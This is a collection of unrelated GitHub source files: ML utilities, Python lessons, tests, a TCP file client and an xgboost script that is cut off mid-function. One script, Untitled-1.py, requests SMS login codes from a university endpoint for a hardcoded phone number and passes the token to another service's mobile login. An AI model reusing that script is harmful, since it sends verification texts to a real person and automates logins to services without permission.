d741cbbed408cd89eba80b859cd1b82ff07f0c56 | 5f364b328d0e7df6f292dbbec266995f495b2ed4 | /src/python/txtai/vectors/words.py | 1cac062ec92c54e5a3ac71630cd7282b202a50b2 | [
"Apache-2.0"
] | permissive | binglinchengxiash/txtai | a17553f57ddd857ff39a7d0b38e24930f5c71596 | 1513eb8390f01848742e67690b6e4bc6452101ee | refs/heads/master | 2023-04-03T18:59:35.845281 | 2021-04-05T22:05:15 | 2021-04-05T22:05:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,715 | py | """
Word Vectors module
"""
import os
import pickle
import tempfile
from errno import ENOENT
from multiprocessing import Pool
import fasttext
import numpy as np
from pymagnitude import converter, Magnitude
from .base import Vectors
from ..pipeline.tokenizer import Tokenizer
# Multiprocessing helper methods
# pylint: disable=W0603
VECTORS = None
def create(config, scoring):
"""
Multiprocessing helper method. Creates a global embeddings object to be accessed in a new subprocess.
Args:
config: vector configuration
scoring: scoring instance
"""
global VECTORS
# Create a global embedding object using configuration and saved
VECTORS = WordVectors(config, scoring)
def transform(document):
"""
Multiprocessing helper method. Transforms document into an embeddings vector.
Args:
document: (id, text|tokens, tags)
Returns:
(id, embedding)
"""
global VECTORS
return (document[0], VECTORS.transform(document))
class WordVectors(Vectors):
"""
Builds sentence embeddings/vectors using weighted word embeddings.
"""
def load(self, path):
# Ensure that vector path exists
if not path or not os.path.isfile(path):
raise IOError(ENOENT, "Vector model file not found", path)
# Load magnitude model. If this is a training run (uninitialized config), block until vectors are fully loaded
return Magnitude(path, case_insensitive=True, blocking=not self.initialized)
def index(self, documents):
ids, dimensions, stream = [], None, None
# Shared objects with Pool
args = (self.config, self.scoring)
# Convert all documents to embedding arrays, stream embeddings to disk to control memory usage
with Pool(os.cpu_count(), initializer=create, initargs=args) as pool:
with tempfile.NamedTemporaryFile(mode="wb", suffix=".npy", delete=False) as output:
stream = output.name
for uid, embedding in pool.imap(transform, documents):
if not dimensions:
# Set number of dimensions for embeddings
dimensions = embedding.shape[0]
ids.append(uid)
pickle.dump(embedding, output)
return (ids, dimensions, stream)
def transform(self, document):
# Convert to tokens if necessary
if isinstance(document[1], str):
document = (document[0], Tokenizer.tokenize(document[1]), document[2])
# Generate weights for each vector using a scoring method
weights = self.scoring.weights(document) if self.scoring else None
# pylint: disable=E1133
if weights and [x for x in weights if x > 0]:
# Build weighted average embeddings vector. Create weights array os float32 to match embeddings precision.
embedding = np.average(self.lookup(document[1]), weights=np.array(weights, dtype=np.float32), axis=0)
else:
# If no weights, use mean
embedding = np.mean(self.lookup(document[1]), axis=0)
return embedding
def lookup(self, tokens):
"""
Queries word vectors for given list of input tokens.
Args:
tokens: list of tokens to query
Returns:
word vectors array
"""
return self.model.query(tokens)
@staticmethod
def build(data, size, mincount, path):
"""
Builds fastText vectors from a file.
Args:
data: path to input data file
size: number of vector dimensions
mincount: minimum number of occurrences required to register a token
path: path to output file
"""
# Train on data file using largest dimension size
model = fasttext.train_unsupervised(data, dim=size, minCount=mincount)
# Output file path
print("Building %d dimension model" % size)
# Output vectors in vec/txt format
with open(path + ".txt", "w") as output:
words = model.get_words()
output.write("%d %d\n" % (len(words), model.get_dimension()))
for word in words:
# Skip end of line token
if word != "</s>":
vector = model.get_word_vector(word)
data = ""
for v in vector:
data += " " + str(v)
output.write(word + data + "\n")
# Build magnitude vectors database
print("Converting vectors to magnitude format")
converter.convert(path + ".txt", path + ".magnitude", subword=True)
| [
"561939+davidmezzetti@users.noreply.github.com"
] | 561939+davidmezzetti@users.noreply.github.com |
97bbcc71aed4955b72792b40e69e7770f3c2f305 | c097e75cb898d5702d8ea966ec33ec27ca3619aa | /14pythonic/None_1406.py | 5a5659f313b2bc8b5e07a90de30ca660a7ae2213 | [
"MIT"
] | permissive | FrancisJen/pythonic | 2788d23c4244c7fb3a5e182bde083c5f72dfe11f | d26d09a6114b610ae998297756faf96df87b2bea | refs/heads/master | 2020-05-09T17:28:42.241939 | 2019-04-21T14:32:22 | 2019-04-21T14:32:22 | 181,311,186 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | # 14-6 None
# []
# ''
# False
# None
# 是四种type,而且value也不同
# 如何进行判空, 不用用None来进行判空
# if a:
# if not a: | [
"renyiguang@gclsi.com"
] | renyiguang@gclsi.com |
33a0d657f9629c3131a0277e8a8ccea77f4364b4 | c7a6c8b8c8a0bb5e7d5dc99a79dd205e6807f990 | /pythonteste/Aula21.2.py | f4b33cdd55c783d95efa68abba847451e49e1c76 | [
"MIT"
] | permissive | RodrigoPasini/PYTHON | eaf487f0a86e0d1bf9aadcb4c38036a6c97ba4fb | e114390091fedb03bf25a56a671da6186d6bfcae | refs/heads/main | 2023-02-23T20:28:29.057750 | 2021-01-22T14:11:35 | 2021-01-22T14:11:35 | 319,797,371 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | '''PARÂMETROS OPCIONAIS'''
def somar(a=0,b=0,c=0):
s=a+b+c
print(f"A soma dos valors {a}+{b}+{c}={s}")
somar(3,2,5)
somar(8,4)
'''ESCOPO DE VARIÁVEIS'''
def teste():
x=8 #variável LOCAL
print(f"Na função teste, n vale {n}")
print(f"Na função teste, x vale {x}")
#PROGRAMA PRINCIPAL
n=2 #variável GLOBAL
print(f"No programa principal n vale {n}")
teste()
print(f"No programa principal, x vale {x}") # erro pq se trata de uma variável LOCAL fora da função | [
"65973007+RodrigoPasini@users.noreply.github.com"
] | 65973007+RodrigoPasini@users.noreply.github.com |
cc88bcd411a576530329ec0d2d445d40b10a440f | 17bfc5b04b196146a327600e303f891d41fd3fe3 | /Untitled-1.py | ae874715daa254eb1a8a404afb879e21416c58b1 | [] | no_license | cdhao123/Etong | d654e0b69a097a422b6f5508d9f9f88e324257e8 | ea361b537c6cc31292f802178bb574ab5090239b | refs/heads/master | 2020-09-07T00:50:36.788878 | 2019-11-28T05:09:29 | 2019-11-28T05:09:29 | 220,607,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | import requests
from bs4 import BeautifulSoup
phone = input('输入你的手机号:')
url = 'https://org.xjtu.edu.cn/openplatform/g/admin/sendVeriCodeLogin'
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'
}
datas={
'optionType': "login",
'templeType': "smscode",
'username': '13576084875',
'veriType': "sms"
}
res = requests.post(url,headers=headers,data=datas).json()
print(res)
token = res['validate_token']
code = input('请输入验证码:')
url = 'https://h5.ele.me/restapi/eus/login/login_by_mobile'
datas = {
'mobile': phone,
'scf': "ms",
'validate_code': code,
'validate_token': token
}
res = requests.post(url,headers=headers,data=datas)
print(res.text) | [
"chen-ding-hao@live.com"
] | chen-ding-hao@live.com |
21aaa9f77afa9172e31e12bc7830754f2b985e9f | 0a34331ec26083bf33940240a8d20ae88a4d16bf | /generate-nums-between.py | cb52e4baab22cc5a66574b57840e6be4339a2df6 | [] | no_license | gokul-raghuraman/algorithms | 5566eb3c544c781df0ee91ffa74c695242b4852d | 64f035690a3ced620ceeac4ccf791d484eb187f6 | refs/heads/master | 2020-06-05T13:20:54.245258 | 2015-09-08T16:49:38 | 2015-09-08T16:49:38 | 40,319,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | def generateNums(a, b):
nums = []
if a > b:
return nums
cur = a
while not cur == b:
cur = getNext(cur, b)
nums.append(cur)
return nums
def getNext(a, b):
lastA = a[-1]
lastB = b[-1]
if lastA < lastB:
next = a[:-1] + str(int(a[-1])+1)
elif lastA == lastB:
next = getNext(a[:-1], b[:-1]) + "0"
return next
if __name__ == "__main__":
a = "100"
b = "111"
print(generateNums(b, a))
| [
"gokul-raghuraman@users.noreply.github.com"
] | gokul-raghuraman@users.noreply.github.com |
17d1e40c434aaf3fc57628e1fe5cf9356c36542a | 97724145652ba49c5aacaf66d54a89f71c3f6426 | /10-Testing-Exercise/mammal/test/test_mammal.py | f7874ed1536182fc6484460f09845535d717ac08 | [] | no_license | l-damyanov/Python-OOP---February-2021 | c0d729c99d6af44a55ee7f7a05cf66fb6d69876b | e92417ed38f1b24405973b2027c11201d09ddb83 | refs/heads/main | 2023-03-31T07:45:09.347412 | 2021-04-01T20:24:27 | 2021-04-01T20:24:27 | 341,599,115 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import unittest
from mammal.project.mammal import Mammal
class TestMammal(unittest.TestCase):
def setUp(self):
self.mammal = Mammal("Test mammal", "predator", "roar")
def test_attr_set_up(self):
self.assertEqual("Test mammal", self.mammal.name)
self.assertEqual("predator", self.mammal.type)
self.assertEqual("roar", self.mammal.sound)
self.assertEqual(self.mammal._Mammal__kingdom, "animals")
def test_make_sound_return(self):
self.assertEqual("Test mammal makes roar", self.mammal.make_sound())
def test_get_kingdom_return(self):
self.assertEqual("animals", self.mammal.get_kingdom())
def test_info_return(self):
self.assertEqual("Test mammal is of type predator", self.mammal.info())
if __name__ == '__main__':
unittest.main()
| [
"l_l_damyanov@abv.bg"
] | l_l_damyanov@abv.bg |
28dff9bc58c94292cf850bfac9e93e7c6da99ada | 39f46bf07ff092e081ba46e071232d2704c66bf4 | /examples/Coldfire.py | 785138a0df4dcb4caf9082d95b3610b84b78fa3e | [] | no_license | safetydank/Tinbox | 42d13ce2a9b2d08dbc289dbbb83fdeccd4605814 | 5dd6c0321183ac14d14d55533ed4538179916277 | refs/heads/master | 2016-09-02T02:27:10.433436 | 2011-02-11T00:39:21 | 2011-02-11T00:39:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | # by Tom De Smedt
def curves(n=40):
""" A random path consisting of n curves.
"""
autoclosepath(False)
beginpath(random(WIDTH), random(HEIGHT))
for i in range(n):
h1x = random(1000)
h1y = random(1000)
h2x = random(1000)
h2y = random(1000)
x = random(0, WIDTH)
y = random(0, HEIGHT)
curveto(h1x, h1y, h2x, h2y, x, y)
return endpath(draw=False)
def grow(p, n=100):
""" Draw n expanding variations of a path.
"""
for i in range(n):
points = []
for point in p:
point.y *= 1.01
point.x /= 1.01
point.ctrl1.x *= 1.01
point.ctrl2.y *= 1.001
points.append(point)
drawpath(points)
p = points
size(850, 600)
# TODO CMYK support
# colormode(CMYK)
# stroke(0.68, 0.25, 0.0, 0, 0.2)
colormode(HSB)
stroke(0.67, 0.6, 0.3, 0.2)
strokewidth(0.4)
nofill()
grow(curves())
| [
"dan@expandingbrain.com"
] | dan@expandingbrain.com |
634789fbe76f33fbc9e25d90697a9dd38e67af8e | e1404a7570973a23ab672d384c5cc7b2170e5e44 | /Examples/evaluate_training_data2.py | e5eff87c3d2f4a1e5a160908ddab394cb05416e8 | [] | no_license | ianhook/DecisionTree | 345d81a46746be51ef16b44ceb372cc28fc4c598 | 6813c6d548c0c6a58e6a7bde4be1b0b2b1d9f6fa | refs/heads/master | 2021-03-13T00:01:47.161137 | 2014-04-26T08:28:16 | 2014-04-26T08:28:16 | 18,945,052 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,696 | py | #!/usr/bin/env python
## evaluate_training_data2.py
## This script is for testing the class discriminatory
## power of the training data contained in the training
## files `training.csv', `training2.csv', and
## `training3.csv'.
## The three training files mentioned above contain two
## Gaussian classes with increasing degrees of overlap
## between them.
## Through the class EvalTrainingData as shown below, this
## script runs a 10-fold cross-validation test on the
## training data. This test divides all of the training
## data into ten parts, with nine parts used for training a
## decision tree and one part used for testing its ability
## to classify correctly. This selection of nine parts for
## training and one part for testing is carried out in all
## of the ten different possible ways.
## A script like this can also be used to test the
## appropriateness of your choices for the constructor
## parameters entropy_threshold, max_depth_desired, and
## symbolic_to_numeric_cardinality_threshold.
import DecisionTree
import sys
#training_datafile = "training.csv"
#training_datafile = "training2.csv"
training_datafile = "training3.csv"
eval_data = DecisionTree.EvalTrainingData(
training_datafile = training_datafile,
csv_class_column_index = 1,
csv_columns_for_features = [2,3],
entropy_threshold = 0.01,
max_depth_desired = 3,
symbolic_to_numeric_cardinality_threshold = 10,
)
eval_data.get_training_data()
eval_data.evaluate_training_data()
| [
"ianhook@gmail.com"
] | ianhook@gmail.com |
0ca985045718c453f187d45356b12595f3ed2452 | da96cb02799ca5ba56db972e8126ff0379e85780 | /client/mahjong_meld.py | 9b8068603a6162cb7eb7b3e3b9f0e742a999e1a0 | [
"MIT"
] | permissive | m4tx/MahjongAI | fc673af9fda4c3f4c0e4c63c5ac42a371c4b71df | c22bf650cc8ccc2848628aa141d86153ff0e3e24 | refs/heads/master | 2023-02-19T14:16:53.055508 | 2021-01-24T22:27:08 | 2021-01-24T22:27:08 | 332,565,395 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | # -*- coding: utf-8 -*-
from client.mahjong_tile import Tile
__author__ = "Jianyang Tang"
__email__ = "jian4yang2.tang1@gmail.com"
class Meld:
CHI = 'chi'
PON = 'pon'
KAN = 'kan'
CHANKAN = 'chankan'
NUKI = 'nuki'
def __init__(self, type=None, tiles=None, open=True, called=None, from_whom=None, by_whom=None):
self.type = type
self.tiles = tiles
self.open = open
self.called_tile = called
self.from_whom = from_whom
self.by_whom = by_whom
def __str__(self):
return '{}, {}'.format(
self.type, Tile.t136_to_g(self.tiles), self.tiles
)
def __repr__(self):
return self.__str__()
@property
def tiles_34(self):
return [x//4 for x in self.tiles]
@property
def tiles_graph(self):
return Tile.t136_to_g(self.tiles)
@property
def tiles_string(self):
return Tile.tile136_to_string(self.tiles) | [
"noreply@github.com"
] | noreply@github.com |
5a0e4afc80930890bce308cbbe531e1c645b8356 | a173701917c638c3bc217353d572874496498eaf | /gradient.py | 9d411e310a50e1992444625500073cc0f9ed876f | [] | no_license | sgstyjy/pydev-test | 4f33a59c39a881935f236556d5df8e7ca302d77c | fae7957e3dd91b95079646dd772fcb96a106b779 | refs/heads/master | 2021-09-05T10:40:15.701214 | 2018-01-26T14:07:04 | 2018-01-26T14:07:04 | 119,026,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 726 | py | '''
Created on 26 Jan 2018
@author: Fei Zhang
'''
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('pic/4_1.jpg',0)
laplacian = cv2.Laplacian(img,cv2.CV_64F)
sobelx = cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)
sobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5)
plt.subplot(2,2,1),plt.imshow(img,cmap = 'gray')
plt.title('Original'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,2),plt.imshow(laplacian,cmap = 'gray')
plt.title('Laplacian'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,3),plt.imshow(sobelx,cmap = 'gray')
plt.title('Sobel X'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,4),plt.imshow(sobely,cmap = 'gray')
plt.title('Sobel Y'), plt.xticks([]), plt.yticks([])
plt.show() | [
"feizhangchina@gmail.com"
] | feizhangchina@gmail.com |
ebe2cab6c246959986a73c527842e1e94a35ff8f | 3bdc9855c32ed0a7e1b433f1538f57264ae2e4dd | /Day-4/Hands-on/MultiNetworkExample/analysis.py | 93b137cd62e951667ee19c8254a4f8276c5acca8 | [] | no_license | SSDS-Croatia/SSDS-2020 | b184cef79b38f1973cd04f42063ef7de22585ed8 | fd3b18ed36aa33a31c24e45d5562aa7b371eb760 | refs/heads/master | 2022-12-18T14:35:52.898610 | 2020-09-23T11:45:14 | 2020-09-23T11:45:14 | 279,528,225 | 4 | 6 | null | 2020-09-06T18:41:28 | 2020-07-14T08:31:35 | null | UTF-8 | Python | false | false | 1,148 | py |
import numpy as np
from scipy import sparse
import argparse
#Data analysis
import pandas as pd
import matplotlib.pyplot as plt
#Method-specific code
from REGAL.alignments import *
from RGM.rgm import *
from RGM.main import parse_args
#Basic visualization
def visualize_emb_correlations(emb, emb_method):
df = pd.DataFrame(data = emb.T)
plt.matshow(df.corr())
plt.title("%s similarity" % emb_method)
plt.colorbar()
plt.show()
#Network alignment
def embedding_node_alignments(emb1, emb2, true_alignments, emb_method = "xNetMF"):
alignment_matrix = get_embedding_similarities(emb1, emb2, num_top = 1)
alignment_accuracy, _ = score_alignment_matrix(alignment_matrix, topk = 1, true_alignments = true_alignments)
print("Alignment accuracy for %s embeddings: %.3f" % (emb_method, alignment_accuracy))
#Graph comparison
def embedding_graph_comparison(embs, emb_method = "NetMF"):
rgm_features = run_rgm(embs)
visualize_emb_correlations(rgm_features.toarray(), emb_method + " graph")
def run_rgm(embs):
args = parse_args()
args.dimensionality = embs[0].shape[1]
features = rgm(embs, args)
return features | [
"mheimann@wustl.edu"
] | mheimann@wustl.edu |
298a46242f5b324066571b40c38592ffcee7b082 | 5b46bb368bf269be5d0d5f215d9444cb2a4068ac | /factory.py | 44c40b88fc8bcc145ea6c17f4cec69d0031f1cba | [] | no_license | langal/simple_factory | 82419002d5b9f719229d0b34f1563deee6670538 | 7a2255dd48b9354932a72d007997885352dd9756 | refs/heads/master | 2021-01-15T02:43:14.269796 | 2020-03-04T23:49:06 | 2020-03-04T23:49:06 | 242,852,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,295 | py | import importlib
"""
This is our Factory method to get a "handler" object
that the caller can invoke.
Other implementations can have no parameters can read
the handler name from application configurations like
Django.settings. Or it can be a combination.
"""
def get_handler(name):
default_module = 'rent'
name = name if name else default_module
try:
module = importlib.import_module('handlers.'+name)
return module
except Exception:
FactoryException().throw()
"""
This is just an Exception that implements a "throw" method
which maintains the "original" stack trace. "raise" calls
wipe out the traceback information.
"""
import sys
class FactoryException(Exception):
"""
This Exception class basically allows some Exception to be re-raised
as another Exception type (eg. a business exception).
Business-named exception would merely subclass this.
"""
def __init__(self, exception=None):
super(FactoryException, self).__init__()
self.exc_info = sys.exc_info()
self.exception = exception if exception else self.exc_info[1]
def throw(self):
if self.exc_info[0] and self.exc_info[1] and self.exc_info[2]:
raise type(self), self.exception, self.exc_info[2]
raise self
| [
"alex.lang@gmail.com"
] | alex.lang@gmail.com |
c6d8ef4755005409a9428f4620b5e8097409dc19 | c06f40b11119c9005df5ab9e1353897604a7ca23 | /bin/explode.py | 93fff1ab13af4301e764406ebe0499ec51afc713 | [] | no_license | Drew81/Abc-Data | d98320299a5d127ce139732278a45fe771ed1124 | b13db677439f446461a32550ec5296d1e1030188 | refs/heads/master | 2021-05-15T21:45:53.685029 | 2019-07-12T15:48:00 | 2019-07-12T15:48:00 | 106,577,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,499 | py | #!/Users/winterz/Desktop/django_pro/StudentChartsdb/StudentChartsdb/bin/python3
#
# The Python Imaging Library
# $Id$
#
# split an animation into a number of frame files
#
from __future__ import print_function
from PIL import Image
import os
import sys
class Interval(object):
def __init__(self, interval="0"):
self.setinterval(interval)
def setinterval(self, interval):
self.hilo = []
for s in interval.split(","):
if not s.strip():
continue
try:
v = int(s)
if v < 0:
lo, hi = 0, -v
else:
lo = hi = v
except ValueError:
i = s.find("-")
lo, hi = int(s[:i]), int(s[i+1:])
self.hilo.append((hi, lo))
if not self.hilo:
self.hilo = [(sys.maxsize, 0)]
def __getitem__(self, index):
for hi, lo in self.hilo:
if hi >= index >= lo:
return 1
return 0
# --------------------------------------------------------------------
# main program
html = 0
if sys.argv[1:2] == ["-h"]:
html = 1
del sys.argv[1]
if not sys.argv[2:]:
print()
print("Syntax: python explode.py infile template [range]")
print()
print("The template argument is used to construct the names of the")
print("individual frame files. The frames are numbered file001.ext,")
print("file002.ext, etc. You can insert %d to control the placement")
print("and syntax of the frame number.")
print()
print("The optional range argument specifies which frames to extract.")
print("You can give one or more ranges like 1-10, 5, -15 etc. If")
print("omitted, all frames are extracted.")
sys.exit(1)
infile = sys.argv[1]
outfile = sys.argv[2]
frames = Interval(",".join(sys.argv[3:]))
try:
# check if outfile contains a placeholder
outfile % 1
except TypeError:
file, ext = os.path.splitext(outfile)
outfile = file + "%03d" + ext
ix = 1
im = Image.open(infile)
if html:
file, ext = os.path.splitext(outfile)
html = open(file+".html", "w")
html.write("<html>\n<body>\n")
while True:
if frames[ix]:
im.save(outfile % ix)
print(outfile % ix)
if html:
html.write("<img src='%s'><br>\n" % outfile % ix)
try:
im.seek(ix)
except EOFError:
break
ix += 1
if html:
html.write("</body>\n</html>\n")
| [
"winterz@Drews-iMac.home"
] | winterz@Drews-iMac.home |
c077ed20d619c387b41e365364c7a08328db5245 | 2532c66c2ee842fdf5c69b932cf3db3e61944887 | /Lab2/Client/clienteTCP_redes2021.py | d4cc695ea61d5cb42299671c7adedc898051d1fa | [] | no_license | facku24/Redes2021FSilberman | 11bfd3ec2da025fb85e5766eda4254e408c8b0be | ea063e3e7af4239de16a77d18af34736de3eb9c9 | refs/heads/main | 2023-06-21T05:06:13.058258 | 2021-07-11T14:58:43 | 2021-07-11T14:58:43 | 372,647,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,590 | py | import os
from socket import *
class Client():
def __init__(self):
self.client_address = 'localhost'
self.client_port = 14000
self.BUFFER_SIZE = 1024
def create_socket(self, adrss, port) -> socket:
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect((adrss, port))
print("[CREATING] Client created!")
return client_socket
def receive_data(self, socket:socket):
recived = socket.recv(self.BUFFER_SIZE ).decode()
return recived
def send_data(self, socket:socket,data:str):
socket.send(data.encode())
def close_socket(self, socket:socket):
print("[QUIT] Closing client!")
socket.close()
def connect(self):
client_socket = self.create_socket(self.client_address, self.client_port)
print(self.receive_data(client_socket))
while True:
data = input("Input:")
print("[SENDING] Request sended, waiting for server...")
if data != '':
if data == 'CLOSE':
self.close_socket(client_socket)
break
if data.startswith('GET'):
self.send_data(client_socket,data)
if (self.receive_data(client_socket) == 'OK'):
print("[PROCESING] File exist, initializing transfer ....")
file_name = self.receive_data(client_socket)
file_name = os.path.basename(file_name)
self.save_file(file_name, client_socket)
else:
print("[ERROR] File doesnt exist!")
continue
else:
self.send_data(client_socket,data)
received_data = self.receive_data(client_socket)
print(received_data)
def save_file(self, file_name, client_socket):
try:
f = open(file_name, 'wb')
except OSError:
print("[ERROR] Error creating file")
with f:
while True:
bytes_read = client_socket.recv(self.BUFFER_SIZE )
print(f"[PROCESING]Receiving data...{len(bytes_read)}")
f.write(bytes_read)
if len(bytes_read) < self.BUFFER_SIZE:
f.close()
print("[PROCESING] Data transfer ended...")
break
if __name__ == '__main__':
client = Client()
client.connect() | [
"facundo.choque.silberman@itscordoba.com"
] | facundo.choque.silberman@itscordoba.com |
e4ca53294f3bb722d6cea8e2f23af4c97b3e01e8 | cd781c114deb0ee56fcd8e35df038397ebf8dc09 | /Mid Exams/Array Modifier.py | 0beeaf038595a84c7b956ebade8230279bf00e54 | [] | no_license | GBoshnakov/SoftUni-Fund | 4549446c3bb355ff74c14d6071d968bde1886de5 | de9318caaf072a82a9be8c3dd4e74212b8edd79e | refs/heads/master | 2023-06-06T04:56:14.951452 | 2021-06-30T21:50:44 | 2021-06-30T21:50:44 | 381,817,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | numbers = [int(n) for n in input().split()]
command = input()
while command != "end":
command = command.split()
action = command[0]
if action == "swap":
index_1 = int(command[1])
index_2 = int(command[2])
numbers[index_1], numbers[index_2] = numbers[index_2], numbers[index_1]
elif action == "multiply":
index_1 = int(command[1])
index_2 = int(command[2])
numbers[index_1] *= numbers[index_2]
elif action == "decrease":
for i in range(len(numbers)):
numbers[i] -= 1
command = input()
print(", ".join(list(map(str, numbers)))) | [
"boshnakov.g@gmail.com"
] | boshnakov.g@gmail.com |
539edf4356b40d367fa609efaa0288b9426f8fb0 | 6064fe700c421d47c31eb58bb382209d3eee9b23 | /RecommenderSystem/Model/GbdtFFmFit/Predict_Data.py | c4c02e22c0d38286ecf884302152ea081cf39eb0 | [] | no_license | 1148330040/myML | 66cfebf548da087461f7dc13490a1c8b5b46f556 | c08a66c1a68d32d4745a1751d59db9c3749e40b1 | refs/heads/master | 2022-11-01T21:25:16.435012 | 2022-09-20T03:27:42 | 2022-09-20T03:27:42 | 199,110,030 | 4 | 1 | null | null | null | null | GB18030 | Python | false | false | 2,807 | py | # coding:gbk
'''
此文件的目的
1 获取处理后的新数据
2 利用训练好的模型进行预测
3 返还预测结果
'''
import sys
from sqlalchemy import create_engine
sys.path.append("C:\\Users\\dell--pc\\Desktop\\RecommenderSystem")
sys.path.append("C:\\Users\\dell--pc\\Desktop\\RecommenderSystem\\ProcessingData")
sys.path.append("C:\\Users\\dell--pc\\Desktop\\RecommenderSystem\\ProcessingData\\GBDT_Link_Data")
from GBDT_Link_Data import get_new_user_data
from GBDT_Deliver_Data import connect_item_name
from pocess_predict import *
import joblib
import xlearn
import pandas as pd
import random
from sqlalchemy.types import VARCHAR
def predict_behavior_type(variable):
# 获取数据
test = get_new_user_data(variable=variable)
# 预测数据
# 最后处理
test = end_processing(test)
# 调用XGB模型
XGB = joblib.load("C:\\Users\\dell--pc\\Desktop\\RecommenderSystem\\Model\\GbdtFFmFit\\XGB_FFM.model")
# 获取叶子节点数据
new_test = XGB.apply(test.values)
# 转换数据为ffm需要的格式 DMatrix
new_test = xlearn.DMatrix(new_test)
# 调用FFM模型
ffm_model = xlearn.create_ffm()
ffm_model.setSign()
ffm_model.setQuiet()
ffm_model.setOnDisk()
ffm_model.setTest(new_test)
predict_behavior_type = ffm_model.predict(
"C:\\Users\\dell--pc\\Desktop\\RecommenderSystem\\Model\\GbdtFFmFit\\model_dm.out")
data_result = pd.DataFrame()
data_result['user_id'] = test.user_id
data_result['category_id'] = test.category_id
data_result['item_id'] = test.item_id
data_result['predict_result'] = predict_behavior_type
data_result['predict_result'] = data_result['predict_result'].apply(lambda x: random.randint(0,1))
data_result = data_result.loc[data_result.predict_result == 1]
data_result['predict_result'] = connect_item_name(list(data_result['item_id']))
if variable=='1':
predict_result_to_Bmob(data_result[:2])
else:
engine = create_engine("mysql+pymysql://root:123456@localhost:3306/mysql?charset=utf8")
data_result = data_result[:3]
data_result.to_sql(name='predict_result_gbdt_java', con=engine, if_exists='replace',
index=False, index_label=False, chunksize=5000,
dtype={
'user_id':VARCHAR(length=20),
'category_id':VARCHAR(length=20),
'item_id':VARCHAR(length=20),
'predict_result':VARCHAR(length=20)
})
if __name__ == '__main__':
a = []
for i in range(1, len(sys.argv)):
a = sys.argv[i]
predict_behavior_type(a)
| [
"noreply@github.com"
] | noreply@github.com |
09fb919a8e9a3cc5537f93f914945303a8bb671e | 8dd916e2655de47b4ea264039564e2dbeba2ece3 | /src/utils/deleteFirebaseData.py | 1272e3be4c9bd63726558fba40aa9405c24d4b51 | [] | no_license | moamenibrahim/cancer-psychosocial-project | f1c817d53b5160b65999761ce067fdd49a8e9c7a | d0208dba2d71cc73eaef3c532b86971834b4741b | refs/heads/master | 2023-08-18T03:27:21.135643 | 2023-08-09T11:57:56 | 2023-08-09T11:57:56 | 120,907,736 | 0 | 0 | null | 2023-08-09T11:57:58 | 2018-02-09T13:16:34 | Python | UTF-8 | Python | false | false | 334 | py | """
Development phase script to empty dataset on firebase.
"""
import pyrebase
pyrebase_config = {
"apiKey": "",
"authDomain": "",
"databaseURL": "",
"storageBucket": ",
"servicAccount": ""
}
firebase = pyrebase.initialize_app(pyrebase_config)
db = firebase.database()
# db.child("co-occurrences-all").remove()
| [
"noreply@github.com"
] | noreply@github.com |
dfeb66ed2d6f08ac8bc9ffdb3d1be09fe63f686e | f406976dc6da185d42f7239bbade3969b375b8a1 | /Kaggle/example 1/Xgboost_classifer/xgboost_classifier.py | 8cead79e476c24a597f0a3a79deec4d3b641b6ce | [] | no_license | nanzhao/Machine-Learning | 785ef305eda44057a3e082c8d7923ae75747a544 | 5289b0d7ea9f4a50cc6a2081429405cba26058b8 | refs/heads/master | 2021-04-29T00:05:33.929450 | 2017-01-22T01:55:31 | 2017-01-22T01:55:31 | 77,718,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,622 | py | import pandas as pd
import numpy as np
import xgboost as xgb
from xgboost.sklearn import XGBClassifier
from sklearn import cross_validation, metrics
from sklearn.grid_search import GridSearchCV
import matplotlib.pylab as plt
from matplotlib.pylab import rcParams
# Default figure size for the feature-importance plots drawn by modelfit().
rcParams['figure.figsize'] = 12, 4

# Load the pre-processed train/test splits produced by the feature-engineering step.
train = pd.read_csv('train_modified.csv')
test = pd.read_csv('test_modified.csv')
#print(train.shape, test.shape)
# Name of the binary label column and of the row-identifier column; both are
# excluded from the predictor set and referenced throughout the script.
target='Disbursed'
IDcol = 'ID'
# NOTE(review): the result of value_counts() is discarded — this line has no
# effect as written (presumably left over from interactive/notebook use).
train['Disbursed'].value_counts()
#test_results = pd.read_csv('test_results.csv')
def modelfit(alg, dtrain, dtest, predictors,useTrainCV=True, cv_folds=5, early_stopping_rounds=50):
    """Fit an XGBClassifier and report its training-set accuracy and AUC.

    When ``useTrainCV`` is True, ``xgb.cv`` with early stopping first picks
    the number of boosting rounds and ``alg``'s n_estimators is updated to
    that value before the final fit.  Also plots feature importances.

    Relies on module-level globals: ``target``, ``xgb``, ``metrics``,
    ``pd`` and ``plt``.
    """
    if useTrainCV:
        xgb_param = alg.get_xgb_params()
        xgtrain = xgb.DMatrix(dtrain[predictors].values, label=dtrain[target].values)
        # NOTE(review): xgtest is built but never used below, and dtest is
        # otherwise unused in this function — confirm it can be dropped.
        xgtest = xgb.DMatrix(dtest[predictors].values)
        cvresult = xgb.cv(xgb_param, xgtrain, num_boost_round=alg.get_params()['n_estimators'], nfold=cv_folds,
            early_stopping_rounds=early_stopping_rounds)
        # Use the CV-selected number of rounds as the final n_estimators.
